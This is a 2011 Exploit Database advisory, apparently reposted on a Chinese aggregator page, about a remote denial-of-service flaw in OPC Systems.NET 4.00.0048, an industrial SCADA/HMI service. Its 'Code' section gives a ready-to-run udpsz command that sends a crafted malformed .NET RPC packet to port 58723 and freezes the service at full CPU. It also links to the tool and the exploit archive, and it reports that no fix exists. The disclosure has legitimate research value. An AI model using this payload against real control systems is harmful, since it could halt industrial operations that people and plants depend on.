OPC Systems.NET 4.00.0048 – Denial of Service

• Exploit Database
• 15 阅读

• 作者： Luigi Auriemma
  日期： 2011-10-10
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17965/

• #######################################################################
  
   Luigi Auriemma
  
  Application:OPC Systems.NET
  http://www.opcsystems.com/opc_systems_net.htm
  Versions: <= 4.00.0048
  Platforms:Windows
  Bug:Denial of Service
  Exploitation: remote
  Date: 10 Oct 2011
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bug
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  From vendor's website:
  "As a Service Oriented Architecture the OPC Systems Service can connect
  to data from OPC Servers, OPC Clients, Visual Studio Applications,
  Microsoft Excel, and databases ... breakthrough .NET products for
  SCADA, HMI, and plant floor to business solutions to shorten your
  development to deployment time."
  
  
  #######################################################################
  
  ======
  2) Bug
  ======
  
  
  OPCSystemsService.exe can be freezed with CPU at 100% through a
  malformed .NET RPC packet.
  No additional research performed.
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip
  
  udpsz -l 2000 -c ".NET\1\0\0\0\0\0\xff\xff\xff\xff\4\0\1\1\x25\0\0\0tcp://127.0.0.1/OPC Systems Interface\6\0\1\1" -T SERVER 58723 0x80
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################